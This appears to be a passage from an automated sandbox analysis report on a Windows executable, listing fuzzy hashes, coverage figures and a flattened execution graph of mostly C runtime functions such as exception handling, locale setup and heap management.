                      • Opcode Fuzzy Hash: 26df89c260fec66ca14058d467dbf074c9a1d408edb5bc0189cbaaa82187ce34
                      • Instruction Fuzzy Hash: 0FF0123159060AFFDB01BFB4ED4ECE93BB9E748305B048531F501D60B0EA7A85969B18
                      Uniqueness

                      Uniqueness Score: -1.00%

                      Execution Graph

                      Execution Coverage:2.7%
                      Dynamic/Decrypted Code Coverage:0.6%
                      Signature Coverage:0.4%
                      Total number of Nodes:1803
                      Total number of Limit Nodes:10
                      execution_graph 8969 406348 8974 40635e 8969->8974 8970 406362 8971 406376 8970->8971 8972 40649b ___std_exception_copy 14 API calls 8970->8972 8973 40636c 8972->8973 8975 4062a0 ___std_exception_copy 41 API calls 8973->8975 8974->8970 8974->8971 8976 4063a0 8974->8976 8975->8971 8976->8971 8977 40649b ___std_exception_copy 14 API calls 8976->8977 8977->8973 9163 40b9ca IsProcessorFeaturePresent 7694 407a4c 7695 407a58 __FrameHandler3::FrameUnwindToState 7694->7695 7706 407596 EnterCriticalSection 7695->7706 7697 407a5f 7707 4076f1 7697->7707 7700 407a7d 7731 407aa3 7700->7731 7706->7697 7708 4076fd __FrameHandler3::FrameUnwindToState 7707->7708 7709 407706 7708->7709 7710 407727 7708->7710 7711 40649b ___std_exception_copy 14 API calls 7709->7711 7734 407596 EnterCriticalSection 7710->7734 7713 40770b 7711->7713 7715 4062a0 ___std_exception_copy 41 API calls 7713->7715 7714 407733 7719 40775f 7714->7719 7735 407641 7714->7735 7716 407715 7715->7716 7716->7700 7720 4078e6 GetStartupInfoW 7716->7720 7742 407786 7719->7742 7721 407903 7720->7721 7723 407997 7720->7723 7722 4076f1 42 API calls 7721->7722 7721->7723 7724 40792b 7722->7724 7726 40799c 7723->7726 7724->7723 7725 40795b GetFileType 7724->7725 7725->7724 7727 4079a3 7726->7727 7728 4079e6 GetStdHandle 7727->7728 7729 407a48 7727->7729 7730 4079f9 GetFileType 7727->7730 7728->7727 7729->7700 7730->7727 7751 4075de LeaveCriticalSection 7731->7751 7733 407a8e 7734->7714 7736 4064ae _unexpected 14 API calls 7735->7736 7738 407653 7736->7738 7737 407660 7739 40650b ___free_lconv_mon 14 API calls 7737->7739 7738->7737 7745 408562 7738->7745 7741 4076b5 7739->7741 7741->7714 7750 4075de LeaveCriticalSection 7742->7750 7744 40778d 7744->7716 7746 40839e _unexpected 5 API calls 7745->7746 7747 40857e 7746->7747 7748 40859c InitializeCriticalSectionAndSpinCount 7747->7748 7749 408587 7747->7749 7748->7749 7749->7738 7750->7744 7751->7733 7755 40184f 7756 401dd4 __InternalCxxFrameHandler GetModuleHandleW 7755->7756 7757 401857 7756->7757 7758 40185b 7757->7758 7759 40188d 7757->7759 7760 401866 7758->7760 7764 405015 7758->7764 7761 405033 __InternalCxxFrameHandler 21 API calls 7759->7761 7763 401895 7761->7763 7765 404ea3 __InternalCxxFrameHandler 21 API calls 7764->7765 7766 405020 7765->7766 7766->7760 7767 40864f 7768 40865a 7767->7768 7770 408680 7767->7770 7769 40866a FreeLibrary 7768->7769 7768->7770 7769->7768 8982 404751 8983 404768 8982->8983 8991 404761 8982->8991 8984 404789 GetModuleFileNameW 8983->8984 8985 404773 8983->8985 8988 4047ae 8984->8988 8986 40649b ___std_exception_copy 14 API calls 8985->8986 8987 404778 8986->8987 8989 4062a0 ___std_exception_copy 41 API calls 8987->8989 9005 404a28 8988->9005 8989->8991 8993 4047f0 8996 4047e9 8993->8996 8997 40482a 8993->8997 8994 4047e4 8995 40649b ___std_exception_copy 14 API calls 8994->8995 8995->8996 8998 40650b ___free_lconv_mon 14 API calls 8996->8998 8999 404841 8997->8999 9000 40484b 8997->9000 8998->8991 9001 40650b ___free_lconv_mon 14 API calls 8999->9001 9003 40650b ___free_lconv_mon 14 API calls 9000->9003 9002 404849 9001->9002 9004 40650b ___free_lconv_mon 14 API calls 9002->9004 9003->9002 9004->8991 9006 404a39 9005->9006 9010 4047db 9005->9010 9007 4064ae _unexpected 14 API calls 9006->9007 9006->9010 9008 404a62 9007->9008 9009 40650b ___free_lconv_mon 14 API calls 9008->9009 9009->9010 9010->8993 9010->8994 9011 407555 9012 407560 9011->9012 9013 408562 6 API calls 9012->9013 9014 407589 9012->9014 9015 407585 9012->9015 9013->9012 9017 4075ad 9014->9017 9018 4075ba 9017->9018 9020 4075d9 9017->9020 9019 4075c4 DeleteCriticalSection 9018->9019 9019->9019 9019->9020 9020->9015 9021 403f56 9024 403f89 9021->9024 9027 4044d4 9024->9027 9028 4044e1 ___std_exception_copy 9027->9028 9032 403f64 9027->9032 9031 40450e 9028->9031 9028->9032 9033 405740 9028->9033 9030 40571a ___std_exception_copy 14 API calls 9030->9032 9031->9030 9034 40574e 9033->9034 9035 40575c 9033->9035 9034->9035 9037 405774 9034->9037 9036 40649b ___std_exception_copy 14 API calls 9035->9036 9041 405764 9036->9041 9039 40576e 9037->9039 9040 40649b ___std_exception_copy 14 API calls 9037->9040 9038 4062a0 ___std_exception_copy 41 API calls 9038->9039 9039->9031 9040->9041 9041->9038 7771 405c57 7772 405c62 7771->7772 7776 405c72 7771->7776 7777 405c78 7772->7777 7775 40650b ___free_lconv_mon 14 API calls 7775->7776 7778 405c93 7777->7778 7779 405c8d 7777->7779 7781 40650b ___free_lconv_mon 14 API calls 7778->7781 7780 40650b ___free_lconv_mon 14 API calls 7779->7780 7780->7778 7782 405c9f 7781->7782 7783 40650b ___free_lconv_mon 14 API calls 7782->7783 7784 405caa 7783->7784 7785 40650b ___free_lconv_mon 14 API calls 7784->7785 7786 405cb5 7785->7786 7787 40650b ___free_lconv_mon 14 API calls 7786->7787 7788 405cc0 7787->7788 7789 40650b ___free_lconv_mon 14 API calls 7788->7789 7790 405ccb 7789->7790 7791 40650b ___free_lconv_mon 14 API calls 7790->7791 7792 405cd6 7791->7792 7793 40650b ___free_lconv_mon 14 API calls 7792->7793 7794 405ce1 7793->7794 7795 40650b ___free_lconv_mon 14 API calls 7794->7795 7796 405cec 7795->7796 7797 40650b ___free_lconv_mon 14 API calls 7796->7797 7798 405cfa 7797->7798 7803 405aa4 7798->7803 7804 405ab0 __FrameHandler3::FrameUnwindToState 7803->7804 7819 407596 EnterCriticalSection 7804->7819 7806 405aba 7809 40650b ___free_lconv_mon 14 API calls 7806->7809 7810 405ae4 7806->7810 7809->7810 7820 405b03 7810->7820 7811 405b0f 7812 405b1b __FrameHandler3::FrameUnwindToState 7811->7812 7824 407596 EnterCriticalSection 7812->7824 7814 405b25 7815 405d45 _unexpected 14 API calls 7814->7815 7816 405b38 7815->7816 7825 405b58 7816->7825 7819->7806 7823 4075de LeaveCriticalSection 7820->7823 7822 405af1 7822->7811 7823->7822 7824->7814 7828 4075de LeaveCriticalSection 7825->7828 7827 405b46 7827->7775 7828->7827 9164 40d3da 9165 4018d4 __ehhandler$??_EGlobalCore@details@Concurrency@@QAEPAXI@Z 5 API calls 9164->9165 9166 40d3eb 9165->9166 9042 40655d 9043 40657d 9042->9043 9052 406593 9042->9052 9044 40649b ___std_exception_copy 14 API calls 9043->9044 9045 406582 9044->9045 9046 4062a0 ___std_exception_copy 41 API calls 9045->9046 9061 40658c 9046->9061 9047 404a28 14 API calls 9049 406651 9047->9049 9048 406607 9048->9047 9048->9048 9051 40665a 9049->9051 9062 406673 9049->9062 9054 40650b ___free_lconv_mon 14 API calls 9051->9054 9052->9048 9055 40661b 9052->9055 9067 406715 9052->9067 9053 4018d4 __ehhandler$??_EGlobalCore@details@Concurrency@@QAEPAXI@Z 5 API calls 9056 406706 9053->9056 9054->9055 9076 4069c1 9055->9076 9057 4066e1 9058 40650b ___free_lconv_mon 14 API calls 9057->9058 9060 4066ee 9058->9060 9063 4069c1 14 API calls 9060->9063 9061->9053 9062->9057 9062->9062 9064 406708 9062->9064 9063->9061 9065 4062b0 ___std_exception_copy 11 API calls 9064->9065 9066 406714 9065->9066 9068 406725 9067->9068 9068->9068 9069 4064ae _unexpected 14 API calls 9068->9069 9070 406758 9069->9070 9071 4062b0 ___std_exception_copy 11 API calls 9070->9071 9072 4067c8 9071->9072 9073 406842 FindFirstFileExW 9072->9073 9074 406879 9073->9074 9075 406715 25 API calls 9074->9075 9080 4069cb 9076->9080 9077 4069db 9079 40650b ___free_lconv_mon 14 API calls 9077->9079 9078 40650b ___free_lconv_mon 14 API calls 9078->9080 9081 4069e2 9079->9081 9080->9077 9080->9078 9081->9061 8064 40b0df 8065 40b0e8 8064->8065 8066 40b18e 8065->8066 8068 40b10f 8065->8068 8073 40c287 8066->8073 8067 40c1b0 8068->8067 8071 40c287 20 API calls 8068->8071 8072 40c1ae 8071->8072 8074 40c290 8073->8074 8077 40c708 8074->8077 8078 40c747 __startOneArgErrorHandling 8077->8078 8082 40c7cf __startOneArgErrorHandling 8078->8082 8085 40cbae 8078->8085 8081 40c804 8083 4018d4 __ehhandler$??_EGlobalCore@details@Concurrency@@QAEPAXI@Z 5 API calls 8081->8083 8082->8081 8088 40cec2 8082->8088 8084 40b19e 8083->8084 8095 40cbd1 8085->8095 8089 40cee6 8088->8089 8090 40cecf 8088->8090 8091 40649b ___std_exception_copy 14 API calls 8089->8091 8092 40ceeb 8090->8092 8093 40649b ___std_exception_copy 14 API calls 8090->8093 8091->8092 8092->8081 8094 40cede 8093->8094 8094->8081 8096 40cbfc __raise_exc 8095->8096 8097 40cdf5 RaiseException 8096->8097 8098 40cbcc 8097->8098 8098->8082 9171 40b9e0 9174 40b9fe 9171->9174 9173 40b9f6 9176 40ba03 9174->9176 9178 40ba98 9176->9178 9179 40c2c3 9176->9179 9178->9173 9180 40c2d6 DecodePointer 9179->9180 9182 40c2e6 9179->9182 9180->9182 9181 40bc2f 9181->9173 9182->9181 9183 40c32a 9182->9183 9184 40c315 9182->9184 9183->9181 9186 40649b ___std_exception_copy 14 API calls 9183->9186 9184->9181 9185 40649b ___std_exception_copy 14 API calls 9184->9185 9185->9181 9186->9181 7829 403862 7830 40579a CallUnexpected 41 API calls 7829->7830 7831 40386a 7830->7831 8099 4030e4 8102 403e54 8099->8102 8103 403e62 ___except_validate_context_record 8102->8103 8104 4029b3 __InternalCxxFrameHandler 51 API calls 8103->8104 8105 403e68 8104->8105 8106 403ea7 8105->8106 8107 403ecd 8105->8107 8110 40310a 8105->8110 8106->8110 8111 40426a 8106->8111 8107->8110 8114 4038eb 8107->8114 8165 404282 8111->8165 8113 40427d 8113->8110 8118 40390b __FrameHandler3::FrameUnwindToState 8114->8118 8115 403c1e 8116 40579a CallUnexpected 41 API calls 8115->8116 8127 403c24 8115->8127 8117 403c8f 8116->8117 8118->8115 8121 4039ed 8118->8121 8122 4029b3 __InternalCxxFrameHandler 51 API calls 8118->8122 8119 403bf3 8119->8115 8120 403bf1 8119->8120 8199 403c90 8119->8199 8124 4029b3 __InternalCxxFrameHandler 51 API calls 8120->8124 8121->8119 8123 403a76 8121->8123 8163 4039f3 type_info::operator== 8121->8163 8125 40396d 8122->8125 8130 403b8d __InternalCxxFrameHandler 8123->8130 8184 402d64 8123->8184 8124->8115 8125->8127 8129 4029b3 __InternalCxxFrameHandler 51 API calls 8125->8129 8127->8110 8132 40397b 8129->8132 8130->8120 8131 403bbd 8130->8131 8133 403be2 8130->8133 8134 403bc7 8130->8134 8131->8120 8131->8134 8135 4029b3 __InternalCxxFrameHandler 51 API calls 8132->8135 8136 40436a __InternalCxxFrameHandler 41 API calls 8133->8136 8137 4029b3 __InternalCxxFrameHandler 51 API calls 8134->8137 8144 403983 8135->8144 8138 403beb 8136->8138 8139 403bd2 8137->8139 8138->8120 8140 403c4e 8138->8140 8141 4029b3 __InternalCxxFrameHandler 51 API calls 8139->8141 8143 4029b3 __InternalCxxFrameHandler 51 API calls 8140->8143 8141->8163 8142 4029b3 __InternalCxxFrameHandler 51 API calls 8145 4039cc 8142->8145 8146 403c53 8143->8146 8144->8115 8144->8142 8145->8121 8150 4029b3 __InternalCxxFrameHandler 51 API calls 8145->8150 8147 4029b3 __InternalCxxFrameHandler 51 API calls 8146->8147 8151 403c5b 8147->8151 8148 4056de _unexpected 41 API calls 8156 403c2e __InternalCxxFrameHandler 8148->8156 8149 403a97 ___TypeMatch 8149->8130 8189 40386b 8149->8189 8152 4039d6 8150->8152 8216 402f57 RtlUnwind 8151->8216 8153 4029b3 __InternalCxxFrameHandler 51 API calls 8152->8153 8157 4039e1 8153->8157 8161 40225b _com_raise_error RaiseException 8156->8161 8179 40436a 8157->8179 8158 403c6f 8160 40426a __InternalCxxFrameHandler 51 API calls 8158->8160 8162 403c7b __InternalCxxFrameHandler 8160->8162 8161->8140 8217 4041e1 8162->8217 8163->8148 8163->8156 8166 40428e __FrameHandler3::FrameUnwindToState 8165->8166 8167 4029b3 __InternalCxxFrameHandler 51 API calls 8166->8167 8173 4042a9 __CallSettingFrame@12 __FrameHandler3::FrameUnwindToState 8167->8173 8169 404329 8170 40579a CallUnexpected 41 API calls 8169->8170 8171 40432e __FrameHandler3::FrameUnwindToState 8169->8171 8172 404369 8170->8172 8171->8113 8173->8169 8174 404350 8173->8174 8175 4029b3 __InternalCxxFrameHandler 51 API calls 8174->8175 8176 404355 8175->8176 8177 404360 8176->8177 8178 4029b3 __InternalCxxFrameHandler 51 API calls 8176->8178 8177->8169 8178->8177 8180 4043fe 8179->8180 8183 40437e ___TypeMatch 8179->8183 8181 40579a CallUnexpected 41 API calls 8180->8181 8182 404403 8181->8182 8183->8121 8185 402d82 8184->8185 8186 402db8 8185->8186 8187 40579a CallUnexpected 41 API calls 8185->8187 8186->8149 8188 402dd3 8187->8188 8190 40388a 8189->8190 8191 40387d 8189->8191 8233 402f57 RtlUnwind 8190->8233 8229 4037d2 8191->8229 8194 40389f 8195 404282 __FrameHandler3::FrameUnwindToState 51 API calls 8194->8195 8196 4038b0 __FrameHandler3::FrameUnwindToState 8195->8196 8234 404012 8196->8234 8198 4038d8 __InternalCxxFrameHandler 8198->8149 8200 403ca6 8199->8200 8210 403dbb 8199->8210 8201 4029b3 __InternalCxxFrameHandler 51 API calls 8200->8201 8202 403cad 8201->8202 8203 403cb4 EncodePointer 8202->8203 8213 403cef 8202->8213 8206 4029b3 __InternalCxxFrameHandler 51 API calls 8203->8206 8204 403dc0 8207 40579a CallUnexpected 41 API calls 8204->8207 8205 403d0c 8208 402d64 __InternalCxxFrameHandler 41 API calls 8205->8208 8211 403cc2 8206->8211 8209 403dc5 8207->8209 8214 403d23 8208->8214 8210->8120 8212 402e31 __InternalCxxFrameHandler 51 API calls 8211->8212 8211->8213 8212->8213 8213->8204 8213->8205 8213->8210 8214->8210 8215 40386b __InternalCxxFrameHandler 53 API calls 8214->8215 8215->8214 8216->8158 8218 4041ed __EH_prolog3_catch 8217->8218 8219 4029b3 __InternalCxxFrameHandler 51 API calls 8218->8219 8221 4041f2 8219->8221 8220 404215 8222 40579a CallUnexpected 41 API calls 8220->8222 8221->8220 8296 40448c 8221->8296 8224 40421a 8222->8224 8230 4037de __FrameHandler3::FrameUnwindToState 8229->8230 8248 403694 8230->8248 8232 403806 __InternalCxxFrameHandler ___AdjustPointer 8232->8190 8233->8194 8235 40401e __FrameHandler3::FrameUnwindToState 8234->8235 8255 402fdb 8235->8255 8238 4029b3 __InternalCxxFrameHandler 51 API calls 8239 40404a 8238->8239 8240 4029b3 __InternalCxxFrameHandler 51 API calls 8239->8240 8241 404055 8240->8241 8242 4029b3 __InternalCxxFrameHandler 51 API calls 8241->8242 8243 404060 8242->8243 8244 4029b3 __InternalCxxFrameHandler 51 API calls 8243->8244 8245 404068 __InternalCxxFrameHandler 8244->8245 8260 404165 8245->8260 8247 40414d 8247->8198 8249 4036a0 __FrameHandler3::FrameUnwindToState 8248->8249 8250 40579a CallUnexpected 41 API calls 8249->8250 8251 40371b __InternalCxxFrameHandler ___AdjustPointer 8249->8251 8252 4037d1 __FrameHandler3::FrameUnwindToState 8250->8252 8251->8232 8253 403694 __InternalCxxFrameHandler 41 API calls 8252->8253 8254 403806 __InternalCxxFrameHandler ___AdjustPointer 8253->8254 8254->8232 8256 4029b3 __InternalCxxFrameHandler 51 API calls 8255->8256 8257 402fec 8256->8257 8258 4029b3 __InternalCxxFrameHandler 51 API calls 8257->8258 8259 402ff7 8258->8259 8259->8238 8269 402fff 8260->8269 8262 404176 8263 4029b3 __InternalCxxFrameHandler 51 API calls 8262->8263 8264 40417c 8263->8264 8265 4029b3 __InternalCxxFrameHandler 51 API calls 8264->8265 8267 404187 8265->8267 8266 4041c8 __InternalCxxFrameHandler 8266->8247 8267->8266 8288 402742 8267->8288 8270 4029b3 __InternalCxxFrameHandler 51 API calls 8269->8270 8271 403008 8270->8271 8272 403010 8271->8272 8273 40301e 8271->8273 8274 4029b3 __InternalCxxFrameHandler 51 API calls 8272->8274 8275 4029b3 __InternalCxxFrameHandler 51 API calls 8273->8275 8276 403018 8274->8276 8277 403023 8275->8277 8276->8262 8277->8276 8278 40579a CallUnexpected 41 API calls 8277->8278 8279 403046 8278->8279 8280 4018d4 __ehhandler$??_EGlobalCore@details@Concurrency@@QAEPAXI@Z 5 API calls 8279->8280 8281 40305b 8280->8281 8282 403066 8281->8282 8283 403e54 __InternalCxxFrameHandler 54 API calls 8281->8283 8282->8262 8284 40309e 8283->8284 8285 4030b5 8284->8285 8291 402f57 RtlUnwind 8284->8291 8292 402e31 8285->8292 8289 4029b3 __InternalCxxFrameHandler 51 API calls 8288->8289 8290 40274a 8289->8290 8290->8266 8291->8285 8293 402e53 __InternalCxxFrameHandler 8292->8293 8295 402e41 8292->8295 8294 4029b3 __InternalCxxFrameHandler 51 API calls 8293->8294 8294->8295 8295->8282 8297 4029b3 __InternalCxxFrameHandler 51 API calls 8296->8297 8298 404492 8297->8298 8299 4056de _unexpected 41 API calls 8298->8299 8300 4044a8 8299->8300 9187 403fe5 9190 404537 9187->9190 9189 403ffa 9191 404544 9190->9191 9192 40454b 9190->9192 9193 40571a ___std_exception_copy 14 API calls 9191->9193 9192->9189 9193->9192 8301 40b0e8 8302 40b0ef 8301->8302 8303 40b18e 8302->8303 8305 40b10f 8302->8305 8306 40c287 20 API calls 8303->8306 8304 40c1b0 8305->8304 8308 40c287 20 API calls 8305->8308 8307 40b19e 8306->8307 8309 40c1ae 8308->8309 9082 405569 9085 404c5a 9082->9085 9084 40556e 9086 404c66 __EH_prolog3 9085->9086 9095 404c24 9086->9095 9091 404bf5 14 API calls 9092 404c92 9091->9092 9093 404bf5 14 API calls 9092->9093 9094 404c9d __InternalCxxFrameHandler 9093->9094 9094->9084 9096 404c36 9095->9096 9097 404c3c 9095->9097 9098 404bf5 14 API calls 9096->9098 9099 404c3f 9097->9099 9098->9097 9100 404c51 9099->9100 9101 404c57 9099->9101 9102 404bf5 14 API calls 9100->9102 9101->9091 9102->9101 7832 40d46b 7833 4018d4 __ehhandler$??_EGlobalCore@details@Concurrency@@QAEPAXI@Z 5 API calls 7832->7833 7834 40d47f 7833->7834 7835 4018d4 __ehhandler$??_EGlobalCore@details@Concurrency@@QAEPAXI@Z 5 API calls 7834->7835 7836 40d489 7835->7836 9194 408df1 9195 408dfe 9194->9195 9196 4064ae _unexpected 14 API calls 9195->9196 9197 408e18 9196->9197 9198 40650b ___free_lconv_mon 14 API calls 9197->9198 9199 408e24 9198->9199 9200 4064ae _unexpected 14 API calls 9199->9200 9204 408e4a 9199->9204 9201 408e3e 9200->9201 9203 40650b ___free_lconv_mon 14 API calls 9201->9203 9202 408562 6 API calls 9202->9204 9203->9204 9204->9202 9205 408e56 9204->9205 8310 4086f2 GetProcessHeap 8311 409cf8 8314 407018 8311->8314 8315 407021 8314->8315 8319 407053 8314->8319 8320 405e4b 8315->8320 8321 405e56 8320->8321 8322 405e5c 8320->8322 8323 4084e1 _unexpected 6 API calls 8321->8323 8324 408520 _unexpected 6 API calls 8322->8324 8342 405e62 8322->8342 8323->8322 8325 405e76 8324->8325 8326 4064ae _unexpected 14 API calls 8325->8326 8325->8342 8328 405e86 8326->8328 8327 40579a CallUnexpected 41 API calls 8329 405ee0 8327->8329 8330 405ea3 8328->8330 8331 405e8e 8328->8331 8333 408520 _unexpected 6 API calls 8330->8333 8332 408520 _unexpected 6 API calls 8331->8332 8335 405e9a 8332->8335 8334 405eaf 8333->8334 8336 405ec2 8334->8336 8337 405eb3 8334->8337 8338 40650b ___free_lconv_mon 14 API calls 8335->8338 8340 405bbe _unexpected 14 API calls 8336->8340 8339 408520 _unexpected 6 API calls 8337->8339 8338->8342 8339->8335 8341 405ecd 8340->8341 8343 40650b ___free_lconv_mon 14 API calls 8341->8343 8342->8327 8344 405e67 8342->8344 8343->8344 8345 406e23 8344->8345 8368 406f78 8345->8368 8350 407d48 _com_raise_error 15 API calls 8351 406e77 8350->8351 8352 406e8d 8351->8352 8353 406e7f 8351->8353 8386 407073 8352->8386 8354 40650b ___free_lconv_mon 14 API calls 8353->8354 8356 406e66 8354->8356 8356->8319 8358 406ec5 8359 40649b ___std_exception_copy 14 API calls 8358->8359 8361 406eca 8359->8361 8360 406f0c 8363 406f55 8360->8363 8397 406a9c 8360->8397 8364 40650b ___free_lconv_mon 14 API calls 8361->8364 8362 406ee0 8362->8360 8365 40650b ___free_lconv_mon 14 API calls 8362->8365 8367 40650b ___free_lconv_mon 14 API calls 8363->8367 8364->8356 8365->8360 8367->8356 8369 406f84 __FrameHandler3::FrameUnwindToState 8368->8369 8370 406f9e 8369->8370 8405 407596 EnterCriticalSection 8369->8405 8372 406e4d 8370->8372 8375 40579a CallUnexpected 41 API calls 8370->8375 8379 406baa 8372->8379 8373 406fda 8406 406ff7 8373->8406 8377 407017 8375->8377 8376 406fae 8376->8373 8378 40650b ___free_lconv_mon 14 API calls 8376->8378 8378->8373 8410 40693f 8379->8410 8382 406bcb GetOEMCP 8384 406bf4 8382->8384 8383 406bdd 8383->8384 8385 406be2 GetACP 8383->8385 8384->8350 8384->8356 8385->8384 8387 406baa 43 API calls 8386->8387 8388 407093 8387->8388 8390 4070d0 IsValidCodePage 8388->8390 8391 407198 8388->8391 8396 4070eb _com_raise_error 8388->8396 8389 4018d4 __ehhandler$??_EGlobalCore@details@Concurrency@@QAEPAXI@Z 5 API calls 8392 406eba 8389->8392 8390->8391 8393 4070e2 8390->8393 8391->8389 8392->8358 8392->8362 8394 40710b GetCPInfo 8393->8394 8393->8396 8394->8391 8394->8396 8453 406c7e 8396->8453 8398 406aa8 __FrameHandler3::FrameUnwindToState 8397->8398 8539 407596 EnterCriticalSection 8398->8539 8400 406ab2 8540 406ae9 8400->8540 8405->8376 8409 4075de LeaveCriticalSection 8406->8409 8408 406ffe 8408->8370 8409->8408 8411 406956 8410->8411 8412 40695d 8410->8412 8411->8382 8411->8383 8412->8411 8413 405d90 _unexpected 41 API calls 8412->8413 8414 40697e 8413->8414 8418 409373 8414->8418 8419 409386 8418->8419 8421 406994 8418->8421 8419->8421 8426 4081ce 8419->8426 8422 4093d1 8421->8422 8423 4093e4 8422->8423 8424 4093f9 8422->8424 8423->8424 8448 407060 8423->8448 8424->8411 8427 4081da __FrameHandler3::FrameUnwindToState 8426->8427 8428 405d90 _unexpected 41 API calls 8427->8428 8429 4081e3 8428->8429 8436 408229 8429->8436 8439 407596 EnterCriticalSection 8429->8439 8431 408201 8440 40824f 8431->8440 8436->8421 8437 40579a CallUnexpected 41 API calls 8438 40824e 8437->8438 8439->8431 8441 408212 8440->8441 8442 40825d _unexpected 8440->8442 8444 40822e 8441->8444 8442->8441 8443 407f82 _unexpected 14 API calls 8442->8443 8443->8441 8447 4075de LeaveCriticalSection 8444->8447 8446 408225 8446->8436 8446->8437 8447->8446 8449 405d90 _unexpected 41 API calls 8448->8449 8450 407065 8449->8450 8451 406f78 ___scrt_uninitialize_crt 41 API calls 8450->8451 8452 407070 8451->8452 8452->8424 8454 406d6f 8453->8454 8455 406ca6 GetCPInfo 8453->8455 8457 4018d4 __ehhandler$??_EGlobalCore@details@Concurrency@@QAEPAXI@Z 5 API calls 8454->8457 8455->8454 8460 406cbe 8455->8460 8459 406e21 8457->8459 8459->8391 8464 407de4 8460->8464 8463 409caf 45 API calls 8463->8454 8465 40693f 41 API calls 8464->8465 8466 407e04 8465->8466 8484 4073aa 8466->8484 8468 407e31 8469 407ec0 8468->8469 8470 407eb8 8468->8470 8472 407d48 _com_raise_error 15 API calls 8468->8472 8475 407e56 _com_raise_error __alloca_probe_16 8468->8475 8471 4018d4 __ehhandler$??_EGlobalCore@details@Concurrency@@QAEPAXI@Z 5 API calls 8469->8471 8487 407ee5 8470->8487 8473 406d26 8471->8473 8472->8475 8479 409caf 8473->8479 8475->8470 8476 4073aa ___scrt_uninitialize_crt MultiByteToWideChar 8475->8476 8477 407e9f 8476->8477 8477->8470 8478 407ea6 GetStringTypeW 8477->8478 8478->8470 8480 40693f 41 API calls 8479->8480 8481 409cc2 8480->8481 8493 409ac0 8481->8493 8491 407312 8484->8491 8488 407ef1 8487->8488 8489 407f02 8487->8489 8488->8489 8490 40650b ___free_lconv_mon 14 API calls 8488->8490 8489->8469 8490->8489 8492 407323 MultiByteToWideChar 8491->8492 8492->8468 8494 409adb 8493->8494 8495 4073aa ___scrt_uninitialize_crt MultiByteToWideChar 8494->8495 8499 409b1f 8495->8499 8496 409c9a 8497 4018d4 __ehhandler$??_EGlobalCore@details@Concurrency@@QAEPAXI@Z 5 API calls 8496->8497 8498 406d47 8497->8498 8498->8463 8499->8496 8500 407d48 _com_raise_error 15 API calls 8499->8500 8502 409b45 __alloca_probe_16 8499->8502 8513 409bed 8499->8513 8500->8502 8501 407ee5 __freea 14 API calls 8501->8496 8503 4073aa ___scrt_uninitialize_crt MultiByteToWideChar 8502->8503 8502->8513 8504 409b8e 8503->8504 8504->8513 8521 4085ad 8504->8521 8507 409bc4 8510 4085ad 6 API calls 8507->8510 8507->8513 8508 409bfc 8509 409c85 8508->8509 8511 407d48 _com_raise_error 15 API calls 8508->8511 8514 409c0e __alloca_probe_16 8508->8514 8512 407ee5 __freea 14 API calls 8509->8512 8510->8513 8511->8514 8512->8513 8513->8501 8514->8509 8515 4085ad 6 API calls 8514->8515 8516 409c51 8515->8516 8516->8509 8527 407464 8516->8527 8518 409c6b 8518->8509 8519 409c74 8518->8519 8520 407ee5 __freea 14 API calls 8519->8520 8520->8513 8530 40829f 8521->8530 8525 4085fe LCMapStringW 8526 4085be 8525->8526 8526->8507 8526->8508 8526->8513 8528 407477 ___scrt_uninitialize_crt 8527->8528 8529 4074b5 WideCharToMultiByte 8528->8529 8529->8518 8531 40839e _unexpected 5 API calls 8530->8531 8532 4082b5 8531->8532 8532->8526 8533 40860a 8532->8533 8536 4082b9 8533->8536 8535 408615 8535->8525 8537 40839e _unexpected 5 API calls 8536->8537 8538 4082cf 8537->8538 8538->8535 8539->8400 8550 407278 8540->8550 8542 406b0b 8543 407278 41 API calls 8542->8543 8544 406b2a 8543->8544 8545 406abf 8544->8545 8546 40650b ___free_lconv_mon 14 API calls 8544->8546 8547 406add 8545->8547 8546->8545 8564 4075de LeaveCriticalSection 8547->8564 8549 406acb 8549->8363 8551 407289 8550->8551 8555 407285 __InternalCxxFrameHandler 8550->8555 8552 407290 8551->8552 8557 4072a3 _com_raise_error 8551->8557 8553 40649b ___std_exception_copy 14 API calls 8552->8553 8554 407295 8553->8554 8556 4062a0 ___std_exception_copy 41 API calls 8554->8556 8555->8542 8556->8555 8557->8555 8558 4072d1 8557->8558 8559 4072da 8557->8559 8560 40649b ___std_exception_copy 14 API calls 8558->8560 8559->8555 8561 40649b ___std_exception_copy 14 API calls 8559->8561 8562 4072d6 8560->8562 8561->8562 8563 4062a0 ___std_exception_copy 41 API calls 8562->8563 8563->8555 8564->8549 8565 4072f9 GetCommandLineA GetCommandLineW 7681 5d70968 7683 5d70978 7681->7683 7682 5d709b2 7683->7682 7685 5d70c78 7683->7685 7686 5d70ccf 7685->7686 7688 5d70c88 7685->7688 7690 5d70d50 7686->7690 7687 5d70cdc 7687->7682 7688->7682 7691 5d70da3 7690->7691 7692 5d70e0f GetCurrentThreadId 7691->7692 7693 5d70ddf 7691->7693 7692->7693 7051 404a83 7064 407507 GetEnvironmentStringsW 7051->7064 7053 404a94 7054 404aa6 7053->7054 7055 404a9a 7053->7055 7077 404ad7 7054->7077 7071 40650b 7055->7071 7060 40650b ___free_lconv_mon 14 API calls 7061 404aca 7060->7061 7062 40650b ___free_lconv_mon 14 API calls 7061->7062 7063 404ad0 7062->7063 7065 407516 7064->7065 7066 407518 7064->7066 7065->7053 7099 407d48 7066->7099 7068 40752d __InternalCxxFrameHandler 7069 40650b ___free_lconv_mon 14 API calls 7068->7069 7070 407547 FreeEnvironmentStringsW 7069->7070 7070->7053 7072 404aa0 7071->7072 7073 406516 HeapFree 7071->7073 7073->7072 7074 40652b GetLastError 7073->7074 7075 406538 ___free_lconv_mon 7074->7075 7076 40649b ___std_exception_copy 12 API calls 7075->7076 7076->7072 7081 404af6 7077->7081 7078 4064ae _unexpected 14 API calls 7079 404b36 7078->7079 7080 404b3e 7079->7080 7090 404b48 7079->7090 7082 40650b ___free_lconv_mon 14 API calls 7080->7082 7081->7078 7081->7081 7098 404aad 7082->7098 7083 404bbd 7084 40650b ___free_lconv_mon 14 API calls 7083->7084 7084->7098 7085 4064ae _unexpected 14 API calls 7085->7090 7086 404bcd 7329 404bf5 7086->7329 7090->7083 7090->7085 7090->7086 7091 404be8 7090->7091 7094 40650b ___free_lconv_mon 14 API calls 7090->7094 7320 4062e4 7090->7320 7335 4062b0 IsProcessorFeaturePresent 7091->7335 7092 40650b ___free_lconv_mon 14 API calls 7095 404bdb 7092->7095 7094->7090 7097 40650b ___free_lconv_mon 14 API calls 7095->7097 7096 404bf4 7097->7098 7098->7060 7100 407d86 7099->7100 7104 407d56 _unexpected 